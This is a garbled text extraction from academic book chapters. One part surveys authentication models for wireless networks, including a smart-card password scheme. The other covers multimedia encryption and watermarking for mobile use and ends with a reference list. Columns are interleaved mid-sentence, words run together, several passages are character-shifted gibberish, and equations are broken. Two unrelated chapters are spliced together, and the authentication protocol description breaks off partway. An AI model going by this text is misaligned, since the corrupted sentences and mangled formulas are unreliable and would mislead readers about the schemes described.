opinion consists of two numbers: the trust value follows: (1) “S” denotes the supplicant; (2) “D”
and the confidence value. The trust value denotes is
the an
destination mobile node; (3) “As” de-
estimate of the trustworthiness of the target, while notes the authenticator; and (4) “Ad” denotes the
theconfidencevaluecorrespondstothe accuracy
destination authentication server. Adding a TTP
related to the assignment of the trust value. Using to this model introduces additional exchanged
the formal theory of semirings, one can show how messages in order to establish trust between the
two nodes can establish an indirect trust relation different interacting nodes.
without previous direct interaction. For that case,
two operators were developed allowing to combine Authentication Management
trust opinions along different paths and compute the Architecture
trust-confidencevaluebetweenpairofnodes.
An authentication system is based on an authenti-
cationprotocolthatfixestheinteractionbet
gEnErAl ModEls for the different components described previously.
AutHEntIcAtIon In wIrElEss The interaction is made using a set of messages
nEtworks between system components. In a wireless environ-
ment, node mobility offers many advantages, but
In addition to authentication solutions applied to at the same time it may affect the overall system
specificwirelesstechnologies,somegeneral efficiency. Consequently, deploying an
models - authenti
are introduced in wireless networks. This section cation system in a wireless environment needs to
discusses these models. consider several aspects including authenticators’
number and placements. The choice made on the
Actors in an Authentication system placement of these servers has an effect on the
time spent to authenticate a mobile node and the
Basically, an authentication system is composed of packet loss ratio. Typically, two strategies may
three actors: (1) a supplicant, (2) an authenticator, be adopted concerning the authentication servers
and (3) a trusted third party (TTP). The supplicant is placement. The former aims at placing authentica-
an entity that requests access to network resources. tion servers on the same network within mobile
It may be a person, or an application running on nodes.Thissolutionleadstoroutethetwotraf
a mobile node. The access to protected resources exchanged
( dataandauthenticationtraffic)withi
is gained only if the credentials provided by the the same network. Consequently, the contention
supplicant are validated by the authenticator. In an and the packet loss ratio are increased. However,
authenticationsystem,acredential theistime
anidentifier
spent during authentication is reduced
that is used by an authenticator to check whether compared with the second solution that aims to
the supplicant is authorized. It may be symmetric place authentication servers outside of the net-
key, a public/private key pair, a generated hash, work and thus forwarding authentication traf
or some contextual information such as physi- outwards. The latter solution reduces the packet
cal characteristic that uniquely - identifies a sup the network bandwidth for
loss ratio and liberates
plicant (e.g., GPS location, signal to noise ratio, useful traffic.

Figure 2. Exchanged messages in a hierarchical Figure3.Exchangedmessagesinaflatauthenti-

authentication model cation model
When deploying an authentication system, a packets can be exchanged between nodes

choice should be made concerning how authen- that belong to the same group. These packets
tication servers manage credentials associated to hold information to update a group key. For
authorized users. Basically, two architectures may example, losing these packets is similar to
be adopted. The former is an architecture where the node that has not received the updated
all authentication servers share the authentication key from the group.
status of all nodes in the network. This model • Large key size: Large keys are desirable for
reduces the amount of messages exchanged be- their high entropy, but at the same time they
tween interacting nodes, as shown by Figure 3, would introduce processing overload and
but holding all authentication information on each also require additional storage space at the
authentication server may introduce a processing mobile node.
overloadsincetheverificationprocess • is performed activities: In wireless net-
Reconnection
on all stored credentials. The second architecture works, connections are often reset and re-
that is deployed is hierarchical where the authen- established by communicating devices. In
tication status of each node is known to a single this case, every reconnection requires fresh
authentication server. According to this approach, authentication parameters associated to the
the number of exchanged messages during the established sessions. This adds significant
authentication process is increased compared with overhead.
theat fl architecture. • Continuous authentication checks: To
prevent attacker attempts against authentica-
Authentication Issues in wireless tion systems, authentication checks should
networks be continuously performed. These checks
introduce additional processing overhead
Authentication is among the security services and storage requirement.
that should be considered in wireless networks.
Theyallowtheidentificationandthevalidation of (2005), the impact of au-
In Wei and Wenye
credentials provided by users to access services. thentication on the security and quality of service
Deploying authentication in wireless networks QoS)
( was quantitatively illustrated. A possible
needs to consider several issues including: solution to key length could be sending a crypto-
graphichashinsteadofthewholekey,butfinding
• Mobility: Routes used between communi- a generic cryptographic hash could be difficult
cating nodes change with time and links are for two reasons. First, in a wireless environment,
unreliable. As a result, exchanged packets devices are in most cases mobile. The conditions,
may be lost. In ad hoc networks, a set of in which two samples (one sent by the user and the

one held by the server) are taken, vary consider- techniques to protect stored credentials. Some se-
ably over time since they are taken under different curity protocols are used to secure credentials. As
working conditions. Therefore, two samples of the DQH[DPSOHRIWHFKQLTXHVWKDWIXO¿OWKHVHQHHGVZH
VDPHREMHFWVXFKDVD¿QJHUSULQWJHQHUDWHGE\ mention the proposed scheme in I-En, Cheng-Chi,
two different sensors are most likely not identical. DQG0LQ6KLDQJWKDWVXSSRUWVWKH’LI¿H
Cryptographic hash functions however, do not Hellman key agreement protocol over insecure
usually preserve distances and hence two samples networks and function according to three phases:
of the same object may result in different digests registration, phase, and authentication.
at different conditions. This scheme employs basic concepts, such as
Introducing sampling in the authentication one-way hash function and discrete logarithm
process may be a solution to reduce bandwidth and problem. During the registration phase, the
power requirements in a wireless environment. As server assigns smart cards to the users requesting
an example of schemes that follow this principle, registration. The registration phase is performed
LAWN is a remote authentication protocol that only when a new user needs to join the system.
enables repetitive remote authentication with large However, the login and authentication phases are
keys (Arnab, Rajnish, & Umakishore, 2005). This performed at each user login attempt. During
approach is motivated by the concept of a holo- UHJLVWUDWLRQ WKH XVHU FKRRVHV DQ LGHQWL¿HU ,’
graphic proof (Polishchuk & Spielman, 1994; Spiel- and a password (PW), it computes h(PW) using a
man, 1995). A holographic proof is a proof of some one-way function h. ID and h(PW) are sent to the
fact, so constructed. To verify the proof, one does server through a secure channel. After receiving
not need to scan through its entire length (Arnab the registration message, the server calculates
HWDO7KHYHUL¿FDWLRQSURFHVVLVOLPLWHGWR B g
h ( x ID ) h ( PW )
mod p , where p is a large prime
the examination of small parts randomly selected. number initially selected by the server, and g is
According to this technique, a small sample of the a primitive number in GF(p). After computing
authentication token is prepared, which can be used B, the server issues a smart card holding ID, B,
at the remote end to perform authentication with p, g and delivers it to the user securely. During
high probability of correctness. This technique login, the user inserts the smart card to a termi-
allows saving bandwidth and power, since if the nal and introduces his/her ID and PW. Then, the
length of the original authentication token is n, then terminal generates a login request message based
the selected sample is only O(logn). As samples on introduced information then it sends it to the
may be different, a function that computes the dif- server. At the server side, B " g h ( x ID ) R mod p is
ference between the patterns is needed. This may computed, where x is the server’s secret key, ID
be achieved by computing the Hamming distance is the user’s identity, and R is a random number
that gives as a result the number of bit positions generated by the server. After that, the server
where two strings differ in. calculates h(B'') and sends it in addition to R to
In the following, several general authentication the user. When received at the user side, the user’s
techniques are detailed. smart card computes B ' ( Bg h ( PW ) ) R mod p and
the validity of the server is checked by comparing
Password Authentication h(B') and h(B'').
If the server is considered valid, the user’s
Password authentication is among the solutions module computes C h(T B ' ) , where T is the
that are frequently required in wireless networks. timestamp associated to the current login, other-
Implementations according to this principle are wise the server is considered invalid and the user
vulnerable to multiple attacks that generally have moves again to the login phase. At this step, the
targeted stored passwords or passwords sent user’s module sends (ID, C, T) to the server. Af-
across the network. As a solution to these threats, ter receiving the request, the server performs the
a proposed scheme should include cryptography checks to determine whether the user is allowed

Multimedia Encryption
Figure 2. Experimental result of the image encryption algorithm
(a) Original image (b) Encrypted image
(Lian, Sun, & Wang, 2004a). These algorithms more popular. Combined with them, some video
obtain high perceptual security and encryption encryption algorithms have been proposed, which
efficiency. In JPEG20 image encryption, only saves time cost by encrypting the compressed video
thesignificantstreamsintheencoded data data stream
selectively or partially.
are encrypted (Ando, Watanabe, & Kiya, 2001, In MPEG1/2 codec, the signs of DCT coef-
2002; Lian, Sun, & Zhang, 2004b; Norcen & Uhl, ficients are encryptedvideo with the
encryption
2003; Pommer & Uhl, 2003), which is selected algorithm (VEA) (Shi & Bhargava, 1998a), the
according to the scalability in space or frequency signsofdirectcurrentcoefficients - (DCs)andmo
domain. These algorithms often keep secure in tion vectors are encrypted with a secret key (Shi &
perception. Figure 2 gives the encryption result Bhargava, 1998b), the base layer is encrypted while
of the algorithm proposed in Lian et al., 2004b). the enhancement layer is left unencrypted (Tosun
As can be seen, the encrypted image is unintel- Feng,
& a)
1 02 the
, DCTcoefficientsarepermuted
ligible. Additionally, in these algorithms, no more (Lian, Wang, & Sun, 2004c; Tang, 1996), or the
than 20% of the data stream is encrypted, which variablelengthcoding(VLC)tablesaremodified
obtainshighefficiency. by rearranging, random bit-flipping, or random
Partial video encryption. Compared with bit-insertion (Wu & Kuo, 2000, 2001).
images or audios, videos are often of higher re- In MPEG4 codec, the Minimal Cost Encryption
dundancy, which are compressed in order to save Scheme (Kim, Shin, & Shin, 2005) is proposed
the transmission bandwidth. Among the video to encrypt only the first 8 bytes in- the macro
codecs, MPEG1/2, MPEG4, and H.264/AVC are blocks (MBs) of a video object plane (VOP). It
Figure 3. VideoencryptionbasedonAVCcodec
(a) Original (b) Encrypted (Ahn et al., 2004) (c)Encrypted(Lianetal.,205a)

is implemented and proved suitable for wireless sion errors are often spread out due to encryption
terminals. A format-compliant configurable - en ciphertext-sensitivity (Mollin, 2006).
algorithms’
cryption framework (Wen, Severa, Zeng, Luttrell, In wireless/mobile applications, some means should
& Weiyin, 2002) is proposed for MPEG4 video be taken to reduce the error propagation.
encryption,whichcanbereconfiguredforagiven Constructing the encryption algorithms based
application scenario including wireless multimedia on error correction code may be a solution. For
communication. example, the encryption algorithm based on
In H.264/AVC codec, the intra-prediction mode forward error correction (FEC) code is proposed
of each block is permuted with the control of the key in Tosun & Feng, 2001b), which permutes the
(Ahn, Shim, Jeon, & Choi, 2004), which makes the information-bits and complements a subset of
video data degraded greatly. Some other algorithms the bits. The encryption algorithm can preserve
(Lian, Liu, & Ren, 2005a; Lian, Liu, Ren, & Wang, the error robustness of the encrypted multimedia
026a) encrypt the DCT coefficients and motion data, that is, the encrypted data stream can realize
vectors with sign encryption. For these algorithm error correction itself. Additionally, the encryption
encrypt both the texture information and motion algorithmisimplementedveryefficientlybecause
information, they often obtain high security in of the simple encryption operations. Thus, it has
human perception. Figure 3 shows the results of some desirable properties suitable for wireless
the algorithm proposed in Ahn et al. (2004) and multimedia transmission. However, the disad-
the one proposed in Lian et al. (2005a). As can be vantage is also clear that it is not secure against
seen, the video encrypted by the former algorithm known-plaintext attacks.
is still intelligible, while the video encrypted by Another solution is to change the block length
the latter algorithm is unintelligible. Thus, for in data encryption. Generally, the block length is in
high security, the latter encryption algorithm is close relation with the error propagation property.
preferred. Taking stream cipher and block cipher for examples,
the former one is of low error propagation, while
communication compliant the latter one is often of high error propagation.
Encryption Generally, the bigger the block length is, the higher
the error propagation is. Due to this case, a robust
Multimedia data are often encrypted before being encryption scheme for secure image transmission
transmitted. In the encrypted data stream, transmis- over wireless channels is proposed in Nanjunda,
Figure 4. Robust video encryption based on segment
Video
K
...
Frame 0 Frame 1 Frame N-1
K0 K1 KN-1
...
... ... ... ...
Slice 0 Slice 1 Slice M-1 Slice 0 Slice 1 Slice M-1 Slice 0 Slice 1 Slice M-1
K0 K0 K0 K1 K1 K1 KN-1 KN-1 KN-1

Figure5. Scalable encryption scheme for MPEG2 video

Compressed
media data
Base layer Middle layer Enhancement layer
Encrypted
media data
Operated
media data
Decrypted
media data
Encryption Cut
Haleem, and Chandramouli (2005), which varies direct operation supported

the block length according to the channel’s error Encryption
properties. This method obtains a trade-off be-
tween the security and error robustness. However, To operate the encrypted multimedia data directly
some problems should be solved before hand, for without decryption is challenging while cost ef-
example, how to transmit the parameters of vary- ficient.Especiallyinwireless/mobileenvironment
ing the block length, and how to determine the no decryption and re-encryption operations are
channel’s error properties in advance. required, which saves much cost. Some solutions
Additionally, segment-based encryption algo- have been proposed to realize direct transcoding
rithms are proposed to reduce the effect cause by or bit rate conversion.
transmission errors. By partitioning the plaintext A secure transcoding scheme is proposed in
into segments and encrypting each segment inde- Chang, Han, Li, and Smith (2004). In this scheme,
pendently, the transmission errors can be limited in the multimedia data are decomposed into multiple
asegment.Theonlydifficultyistosynchronize streamstheat the source, each stream is encrypted
segments. An example proposed in Lian, Liu, Ren, independently, and each stream is annotated with
and Wang (2005b) is shown in Figure 4. It encrypts cleartext metadata. In transcoding, lower priority
advanced video coding (AVC) videos according streams are dropped directly based on the cleartext
to the following steps: (1) partition the video data metadata. The receiver can decrypt the remaining
into N frames (each frame acts as a segment), (2) streams and recombine them into the transcoded
partition each frame into M macroblocks (each output stream.
macroblock acts as a subsegment), and (3) encrypt As progressive and scalable encoding becomes
each frame with different keys (K0, K1,…, K N-1), more and more popular, such as JPEG2000, MPEG4
and encrypt all the macroblocks in a frame with FGS, SVC, and so forth, scalable encryption is
the same key. Thus, if a macroblock is lost, the focused, which supports direct bit rate conversion.
other macroblocks can still be recovered correctly. The scalable encryption algorithm encrypts the
If a frame is lost, the frame index can be used to progressive or scalable data streams, for example,
synchronize the key, and recover other frames base layer, middle layer, or enhance layer, one by
correctly. Thus, if the synchronization problem onefromthesignificantonestotheleastsignifican
is solved, the segment based encryption will be a ones. Thus, the bit rate can be changed by cutting the
good solution in wireless/mobile applications. insignificantstreamsdirectly.Forexample,Tosun
and Feng (2000) proposed the algorithm shown in

Figure 5, which encrypts only the base layer and trary, the watermarking algorithms with lost cost
middle layer in the three layers (base layer, middle are often of low security or robustness. This con-
layer, and enhancement layer) of an MPEG2 video tradiction becomes a problem in wireless/mobile
stream. In this algorithm, the enhancement layer environment when the limited energy or computing
is left unencrypted, which can be cut off directly. capability is provided. Experiments have been done
Wee and Apostolopoulos (2001, 2003) and Zhu, to analyze the energy consumption, complexity
Yuan, Wang, and Li (2005) proposed the algorithms and security level of multimedia watermarking
for secure scalable streaming enabling transcod- on mobile handheld devices (Kejariwal, Nicolau,
ing without decryption. Generally, the stream is Dutt, & Gupta, 2005). And some conclusions are
partitioned into segments according to the cipher’s drawn: (1) the security level often contradicts with
code length. To change the bit-rate, some segments energy consumption, (2) watermark extraction/
at the end of the stream are cut off directly. detection may be of higher cost than watermark
embedding, and (3) image resolution affects the
energy consumption. To conquer these problems,
tHE wAtErMArkIng AlgorItHMs some proposals are presented, for example, intro-
for wIrElEss MultIMEdIA duce the tunable parameter to obtain trade-offs
between security level, energy consumption, and
Watermarking algorithms (Barni & Bartolini, other performances, or move some computationally
2004; Cox et al., 2002) are generally composed expensive tasks to mobile proxies.
of two parts, that is, watermark embedding and
watermark extraction/detection. Generally, wa- Mobile Agent based task Partitioning
termarking algorithms should be robust to some
operations, such as recompression, A/D or D/A Mobile agents use the proxies as agents that can
conversion, noise, filtering, and so forth andto
connect can
a range of heterogeneous mobile ter-
survive such attacks as geometric attack, collusion minals. Using mobile agents to reduce the load of
attack, copy attack, and so forth. Similar to encryp- the server or terminals has been widely studied
tion algorithms, some watermarking algorithms (Burnside et al., 2002; Rao, Chang, Chen, & Chen,
may be of high security and robustness, but they 2001). If the mobile agent can implement water-
are also of high time or energy cost. On the con- mark embedding or extraction/detection, then the
terminals’ computing load will be greatly reduced.
Figure6. Watermarking tasks partitioning based on mobile agents

Figure 7. Architectures of some lightweight watermarking algorithms
Watermark
Fast Watermark Fast Inverse Watermarked

Media data
Transformation embed Transformation media data
(a) Fast transformation based watermarking embedding
Watermark
Compressed Partial Watermark Partial Watermarked

media data reconstruction embed encoding media data
(b) Watermarking embedding in compressed media data
The scheme proposed in Liu and Jiang (2005), as typicalonesareshowninFigure.The 7 firstone,

shown in Figure 6, uses mobile agent to replace as shown in Figure 7a, uses fast transformations
terminals to realize watermark detection, which to reduce the cost of converting media data into
decreases the server and network’s load during frequency domain. The second one, as shown in
detecting watermarks. In another scheme (Keja- Figure 7b, embeds the watermark into the com-
riwal, Gupta, Nicolau, Dutt, & Gupta, 2004), the pressed media data according to the following steps:
watermark embedding and detection tasks are both )reconstruct
1( thecoefficientspartiallyfromthe
partitioned and moved to mobile proxies completely compressed data stream, (2) embed the watermark
or partially. For example, to keep secure, only some intotheselectedcoefficients,andre- ) 3 ( encodethe
tasks not sensitive to the security are moved out, watermarkedcoefficients.Inthefollowingcontent
such as image transformation, bit decomposition, some lightweight watermarking algorithms are
plane alignment, and so forth. The partitioning introduced and analyzed.
schemes make watermarking applications more A scalable watermarking algorithm is proposed
practical in mobile environment. to mark the audio data encoded with Advanced
Audio Zip (AAZ) (Li, Sun, & Lian, 2005). In
lightweight watermarking this algorithm, the watermark is embedded into
Algorithms thequantizedmodifieddiscretecosinetransfor
(MDCT)coefficientsinthecorelayeradaptively,
Using mobile agents to implement some watermark- and detected by computing the correlation between
ing related tasks can reduce the load of the server the spreading sequence and the bitstream. A speech
or terminals in some extent. However, frequent watermarking scheme is proposed in Arora and
interaction between mobile agent and terminals Emmanuel (2003), which is designed based on the
are still costly. To reduce the cost of the server or adaptive modulation of spread spectrum sequences
terminals,improvingtheefficiencyof - watermark
and is robust against some removal or impairment
ing embedding, or extraction/detection algorithms attacks. The experiments in global system for
is a key problem. Considering that the watermark mobile communications (GSM) cellular commu-
is often embedded into the transformation domain, nications show that the algorithm is suitable for
some lightweight algorithms are proposed to imple- mobile applications.
ment transformation domain watermarking. Two

Forimages,anefficientsteganographyscheme robust video watermarking algorithm (Alattar,

(Pal, Saxena, & Muttoo, 2004) is proposed for Lin, & Celik, 2003) is proposed for low bit rate
resources constrained wireless networks. In this MPEG4 videos. In this algorithm, the watermark
scheme,thecoefficientsinHadamardtransform- is composed of both the synchronization template
domain are manipulated to contain some hidden and the watermark content combined with the
information. The Discrete Hadamard Transform template, and the watermark is embedded into
can be implemented using fast algorithms, which the alternative current AC) ( coefficients of th
makes the scheme computationally efficient luminanceandplane of the VOPs. The template can
practical in mobile communications. survive geometric attacks, such as transcoding,
For videos, a spread spectrum watermarking cropping, scaling, rotation, noise, and so forth.
algorithm (Petrescu, Mitrea, & Preteux, 2005) Experiments on various videos are done, which
is proposed to protect low rate videos. In this show good performances for the video rate ranging
algorithm, the DCT or wavelet coefficients of to 768kbit/s.
from 128kbit/s
transformed video data are watermarked with
spread spectrum sequences. Experiments are communication compliant
done for the videos varying from 64kbit/s to 256 Algorithms
kbit/s, and suitable transparency or robustness is
obtained.Furthermore,amoreefficientIn algorithm
wireless/mobile communication, transmission
(Checcacci, Barni, Bartolini, & Basagni, 2000) is errors often happen, which may reduce the wa-
proposed to mark MPEG4 videos. In this algorithm, termark detection rate. Generally, several means
only the Luma macroblocks are watermarked by may be adopted to improve the watermarking
adjustingthecoefficients’valueineach coefficient
algorithm’s robustness against transmission errors.
pair. It is proved efficient in implementation The firstand one, as shown in Figurea, 8 is applying
robust to transmission errors. Additionally, a more
Figure 8. Architectures of some robust watermarking algorithms
Media data
ECC Watermark Watermark ECC Extracted

Watermark
Encode embed extract decode watermark
(a) ECC based watermarking scheme
Watermark
MDC
Encode
Watermark MDC MDC Watermark

Media data Encode Decode extract
embed
MDC
Decode
Extracted
watermark
(b) MDC based watermarking scheme

error-correcting codes (ECC) to encode the wa- coMbInAtIon of MultIMEdIA

termark before embedding it into the multimedia EncryPtIon And MultIMEdIA
data. For example, the watermark can be repeated wAtErMArkIng
for several times (Kundur, 2001), such codes as
convolutional code, block code, or turbo code are Multimedia encryption and watermarking realize
used to encode the watermark (Ambroze et al., differentfunctionalities,forexample, - confidentia
2001), or the combination of watermark repetition ity protection and ownership protection, they can
and error-correcting code is used (Desset, Macq, & be combined together to provide stronger security.
Vandendorpe, 2002). This kind of method improves This is also required by some applications, such
the robustness by increasing the redundancy in the as secure multimedia sharing, secure multimedia
watermark. The second method, as shown in Fig- distribution, or exchange between watermarking
ure 8b, is using multiple description code (MDC) and encryption.
to transmit the watermark or the watermarked
multimedia data. For example, the watermark is secure Multimedia sharing
encoded with MDC before being embedded (Hsia,
Chang, & Liao, 2004), the watermarked media Multimedia sharing is more and more popular
data are transmitted based on MDC (Chu, Hsin, with the development of network technology, es-
Huang, Huang, & Pan, 2005; Pan, Hsin, Huang, pecially when such a network as p2p is developed.
& Huang, 2004), or both the watermark and the Generally, in these applications, the ownership
watermarked media data are encoded with MDC information is embedded into the multimedia
(Ashourian & Ho, 2003). This kind of method data with watermarking technology, and then the
adopts the redundancy of multimedia data and is watermarked multimedia data are encrypted and
more suitable for the scenario of high error rate. distributed. The ownership information can be
Another method (Song, Kim, Lee, & Kim, 2002) extracted later to prove the ownership right, and
partitions multimedia data into segments each of the encryption process prevents unauthorized users
whichfitsforthepacketinwirelesstransmission, from accessing the real content of the multimedia
and then embeds a watermark into each packet. data. A typical example is the music sharing sys-
Thus, it is robust to wireless packet error condi- tem, named Music2Share (Kalker, Epema, Hartel,
tions including not only channel error but also Lagendijk, & Steen, 2004), as shown in Figure 9. In
delay and jitter. this system, the watermark representing ownership
informationisembeddedintomusicfiles,andthe
Figure9. Architecture of a multimedia sharing system
Media
Server
Content
Access Right

watermarkedfilesareencryptedthen distributed
multimedia data should be decrypted before being
over p2p networks. The customer can access the watermarked. In some applications, if the operation
encrypted music files, while must applytriple for the
decryption-watermarking-encryption can be
right from the server before he can decrypt the avoided, the operation cost will be reduced greatly.
files.Thewatermarkextractedfromthe Inmusic filethe encrypted multimedia data can
this case,
can prove the legality of the music. be watermarked directly without decryption, and
the watermark can be extracted directly from the
secure Multimedia distribution encrypted or decrypted multimedia data. This kind
of watermarking-encryption pair is named com-
In secure multimedia distribution, multimedia mutative watermarking and encryption (CWE). A
data are transmitted from the server to customers practical scheme is proposed in Lian, Liu, Ren, and
in a secure way. In this case, the confidentiality Wang (2006c), which is based on partial encryption.
can be protected, and the illegal distributor who In this scheme, multimedia data are partitioned into
redistributes his/her copy to other customers can two parts, that is, the perception significant pa
be traced. Generally, both encryption and water- and the robust part, among which, the perception
marking technology are used. Till now, three kinds significantpartisencrypted,whiletherobustpa
of schemes have been proposed, which embed is watermarked. Thus, the encryption and water-
watermarks at the server side, in the router or at marking are independent of each other, and they
the client side, respectively. In thesupport first kind of
the commutative operations.
scheme, the customer information is embedded
into multimedia data at the server side before mul-
timedia encryption. This scheme is more suitable oPEn IssuEs
for unicast than for multicast or broadcast because
itisdifficultfortheservertoassign - differentcopbetween format
contradiction
ies to different customers simultaneously. In the Independence and format
second kind of scheme, the customer information compliance
is embedded by the routers in lower level (Brown,
Perkins, & Crowcroft, 1999), which distributes To keep low cost, partial encryption scheme is used
the server’s loading to the routers. This scheme to encrypt multimedia data, which keeps format
reduces the server’s loading, but also changes the compliant. Thus, for different multimedia data or
network protocols. In the third kind of scheme, the different codec, the encryption algorithms are often
customer information is embedded at the customer different. If various multimedia data are included in
side(Bloom,This . ) 30 2 schemeistimeefficient,an application, then various encryption algorithms
but the security is a problem because of the isola- should be used, and some extra information is re-
tion between decryption and watermarking. Some quired to tell which encryption algorithm has been
means (Anderson & Manifavas, 1997; Kundur & used. Compared with format compliant encryption,
Karthik, 2004; Lian, Liu, Ren, & Wang, 2006b) format independent encryption regards multimedia
have been proposed to improve the security, which data as binary data and is easy to support various
combine decryption with watermark embedding. data. Thus, for the applications with versatile data,
These combined methods improve the system’s format independent encryption is more suitable.
security at the same time of keeping low cost. For example, in such DRM systems as internet
streaming media alliance (ISMA), advanced access
commutative watermarking and content system (AACS), or open mobile alliance
Encryption (OMA) (Kundur et al., 2004), the algorithms,
advanced encryption standard (AES) and data
Generally, watermarking operation and encryp- encryption standard (DES), are recommended to
tion operation are separate. That is, the encrypted encrypt multimedia data not considering the fil

format. Thus, for practical applications, the trade- key Management in Mobile
off between computational cost and convenience Applications
is to be made, which determines which kind of
algorithm should be used. Multimedia encryption and watermarking can
both be controlled by the keys; key management
standardization of watermarking needs to be investigated. For example, whether
Algorithms the encryption key should be independent of the
watermarking key, and how to assign different
Compared with encryption algorithms that have decryption keys to different customers in mul-
been standardized to some extent, watermarking timedia distribution? Additionally, for multic
algorithms are still in study. For the diversity of or p2p networks, key generation and distribution
multimedia content, the difficulty in(Cherukuri, multimedia 2004; Eskicioglu, 2002) are important
understanding and the variety of applications, it topicsnotonlyinfixednetworksbutalsoinmobile
isdifficulttostandardizemultimedia - watermark
environments.
ing algorithms. Generally, they have different
performances in security, efficiency, robustness,
capacity, and so forth. Using which watermarking conclusIon
algorithm depends on the performances required
bytheapplications.Definingsuitable - watermark
In this chapter, mobile/wireless multimedia encryp-
ing algorithms will provide more convenience to tion and watermarking algorithms are introduced
wireless/mobile applications. and analyzed, including the general requirements,
various multimedia encryption algorithms, some
fingerprint Algorithms Against watermarking algorithms, the combination be-
collusion Attacks tween encryption and watermarking, and some
open issues. Among them, the multimedia encryp-
In secure multimedia distribution, collusion attack tionalgorithmsareclassifiedand-analyzedaccord
(Zhao, Wang, & Liu, 2005) threatens the system. ing to the functionalities, and the watermarking
That is, different customers combine their copies algorithms with low cost are emphasized. The
together through averaging, substitution, and so combination between encryption and watermark-
forth, which produces a copy without any customer ing brings up some new research topics, for ex-
information.Tocounterthisattack, - ample,
somefingerfingerprintorcommutativewatermarking
print encoding methods (Boneh & James, 1998; Wu, and encryption. And some open issues are also
Trappe, Wang, & Liu, 2004) have been proposed. presented, including the contradiction between
Thesemethodsgeneratedifferentfingerprint codesand format independence, the
format compliance
for different customers, and the colluded copy can standardization of watermarking algorithms, the
still tell one or more of the colluders. However, fingerprintalgorithmsresistingcollusionatt
there is still a trade-off between the watermark and the key management in mobile applications.
capacity and the supported customers, and some
new attacks are still not predicted, such as the linear
combination collusion attack (LCCA) attack (Wu, rEfErEncEs
Thus,
. )05 2 betterfingerprintencodingmethods
withgoodefficiencyareexpected. Ahn, J., Shim, H., Jeon, B., & Choi, I. (2004). Digital
video scrambling method using intra prediction
mode. In PacificRimConferenceonMultimedia,
PCM2004 (LNCS 3333, 386-393). Springer.
0
Alattar, A., Lin, E., & Celik, M. (2003). Digital wa- Brown, I., Perkins, C., & Crowcroft, J. (1999). Wa-
termarkingoflowbit-rateadvancedsimple profile
tercasting: Distributed watermarking for multicast
MPEG-4 compressed video. IEEE Transactions media. In Proceedings of the First International
on Circuits and Systems for Video Technology, Workshop on Networked Group Communication
13, 787-800. (LNCS 1736, pp. 286-300). Springer-Verlag.
Ambroze, A., Wade, G., Serdean, C., Tomlinson, Burnside, M., Clarke, D., Mills, T., Maywah, A.,
M., Stander, J., & Borda, M. (2001). Turbo code Devadas, S., & Rivest, R. (2002). Proxy-based
protection of video watermark channel. IEE Pro- security protocols in networked mobile devices.
ceedingsofVisionandImageSignalProcessing, In Proceedings of the 2002 ACM symposium on
148, 54-58. Applied Computing (pp. 265-272).
Anderson, R., & Manifavas, C. (1997). Cham- Chang, Y., Han, R., Li, C., & Smith, J. R. (2004).
leon—A new kind of stream cipher. In Fast Soft- Secure transcoding of Internet content. In Pro-
ware Encryption (LNCS, vol. 1267, pp. 107-113). ceedings of International Workshop on Intelligent
Springer-Verlag. Multimedia Computing and Networking (IMMCN)
(pp. 940-943).
Ando, K., Watanabe, O., & Kiya, H. (2001). Partial-
scrambling of still images based on JPEG2000. Checcacci, N., Barni, M., Bartolini, F., & Basagni,
In Proceedings of the International Conference S. (2000). Robust video watermarking for wireless
on Information, Communications, and Signal multimedia communications. In Proceedings of the
Processing, Singapore. 2000 IEEE Conference on Wireless Communica-
tions and Networking (pp. 1530-1535).
Ando, K., Watanabe, O., & Kiya, H. (2002). Par-
tial-scrambling of images encoded by JPEG2000. Cherukuri, S. (2004). An adaptive scheme to man-
IEICETransactions,J85-D-1 (2), 282-290. age mobility for secure multicasting in wireless
local area networks. Unpublished masters thesis,
Arora, S., & Emmanuel, S. (2003). Real-time
Arizona State University, Tempe.
adaptive speech watermarking scheme for mobile
applications. In Proceedings of the International Chu, S., Hsin, Y., Huang, H., Huang, K., & Pan, J.
Conference on Information, Communications & (2005). Multiple description watermarking for lossy
SignalprocessingICICS) ( —IEEEPacific-rimCon
- network. IEEE Computer Society,4, 3990-3993.
ference on Multimedia (PCM) (pp. 850-853).
Cox, I., Miller, M., & Bloom, J. (2002). Digital wa-
Ashourian, M., & Ho, Y. (2003). Multiple descrip- termarking. San Francisco: Morgan Kaufmann.
tion coding for image data hiding jointly in the
Desset, C., Macq, B., & Vandendorpe, L. (2002).
spatial and DCT domains. In ICICS 2003 (LNCS
Block error-correcting codes for systems with a
2836, 179-190).
very high BER: Theoretical analysis and application
Barni, M., & Bartolini, F. (2004). Watermark to the protection of watermarks. Signal Processing:
systems engineering. Marcel Dekker. Image Communication, 17, 409-421.
Bloom, J. (2003). Security and rights management Dutta, A., Das, S., Li, P., & Auley, A. (2004).
in digital cinema. Proceedings of IEEE Interna- Secured mobile multimedia communication for
tional Conference on Acoustic, Speech and Signal wireless Internet. In Proceedings of 2004 IEEE
Processing, 4, 712-715. International Conference on Networking, Sensing
& Control (pp. 181-186).
Boneh, D., & James, S. (1998). Collusion-secure
fingerprintingfordigital data.
IEEE Transactions Eskicioglu, A. (2002). Multimedia security in group
on Information Theory, 44(5), 1897-1905. communications: Recent progress in wired and
wireless networks. In Proceedings of the IASTED

International Conference on Communications of the 2004 Design Automation Conference (pp.

and Computer Network s, Cambridge, MA (pp. 556-561).
125-133).
Kejariwal, A., Nicolau, S., Dutt, A., & Gupta, N.
Furht, B., & Kirovski, D. (Eds.). (2006). Multi- (2005). Energy analysis of multimedia watermark-
media encryption and authentication techniques ing on mobile handheld devices. In Proceedings
and applications. Boca Raton, FL: Auerbach of the International Conference on Embedded
Publications. Systems for Real-Time Multimedia (ESTImedia
) 502 (pp. 33-38).
Gang, L., Akansu, A., Ramkumar, M., & Xie,
X. (2001). Online music protection and MP3 Kim, G., Shin, D., & Shin, D. (2005). Intellectual
compression. In Proceedings of the International property management on MPEG-4 video for hand-
SymposiumonIntelligentMultimedia,Video andand mobile video streaming service.
held device
Speech Processing (pp. 13-16). IEEE Transactions on Consumer Electronics,
1 5 (1), 139-143.
Ganz, A., Park, S., & Ganz, Z. (1998). Inline net-
work encryption for multimedia wireless LANs. Kundur, D. (2001). Watermarking with diversity:
In Proceedings of the IEEE Military Communica- insights and implications. IEEE Transactions on
tions Conference. Multimedia, 8, 46-52.
Ganz, A., Park, S., & Ganz, Z. (1999). Experimental Kundur, D., & Karthik, K. .)024( Video fin -
measurements and design guidelines for real-time gerprinting and encryption principles for digital
software encryption in multimedia wireless LANs. rights management. Proceedings of the IEEE,
Cluster Computing, 2(1), 35-43. 2 9 (6), 918-932.
